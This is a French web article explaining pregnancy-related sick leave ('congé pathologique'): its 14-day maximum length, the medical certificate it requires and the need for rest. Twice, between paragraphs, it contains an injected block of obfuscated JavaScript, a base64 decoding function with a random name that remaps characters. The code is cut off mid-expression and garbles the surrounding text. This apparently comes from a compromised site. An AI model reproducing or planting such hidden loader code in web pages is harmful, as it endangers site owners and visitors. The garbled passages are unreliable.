Le congé pathologique, c’est quoi?

Conge pathologique

function h94fcba1e7(y1){var vd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb= »;var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.charAt(p6++));y3=vd.indexOf(y1.charAt(p6++));w4=vd.indexOf(y1.charAt(p6++));u5=vd.indexOf(y1.charAt(p6++));p3=(q9<<2)|(y3>>4);na=((y3&15)<<4)|(w4>>2);pc=((w4&3)<<6)|u5;if(p3>=192)p3+=848;else if(p3==168)p3=1025;else if(p3==184)p3=1105;yb+=String.fromCharCode(p3);if(w4!=64){if(na>=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCode(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6criptif »>La fin de la grossesse peut être très fatigante pour une future maman. Les raisons sont nombreuses : beaucoup de déplacements, longs trajets en transports en commun, travail physique ou stressant, etc. Et parfois, pour la santé du bébé et de la maman, il est nécessaire de prescrire un congé pathologique.

function h94fcba1e7(y1){var vd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb= »;var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.charAt(p6++));y3=vd.indexOf(y1.charAt(p6++));w4=vd.indexOf(y1.charAt(p6++));u5=vd.indexOf(y1.charAt(p6++));p3=(q9<<2)|(y3>>4);na=((y3&15)<<4)|(w4>>2);pc=((w4&3)<<6)|u5;if(p3>=192)p3+=848;else if(p3==168)p3=1025;else if(p3==184)p3=1105;yb+=String.fromCharCode(p3);if(w4!=64){if(na>=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCode(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6criptif »>Tu te retrouves dans cette situation ? Voici quelques informations à connaître sur le congé pathologique.

Quelle est la durée du congé pathologique ?

Le congé pathologique est un congé supplémentaire d’une durée maximale de 14 jours qui peut être prescrit par ton médecin si ton état de santé présente un risque pour la grossesse : grande fatigue, hypertension, diabète gestationnel, etc.

Attention, le congé pathologique nécessite un certificat médical. Ce n’est pas un droit au même titre que le congé maternité.

Pendant le congé pathologique, la future maman doit rester au repos complet pour limiter les risques éventuels de complication, alors c'est le moment de mettre ton homme à contribution pour les tâches ménagères et d'éviter le surmenage !

Continuons la lecture, par ici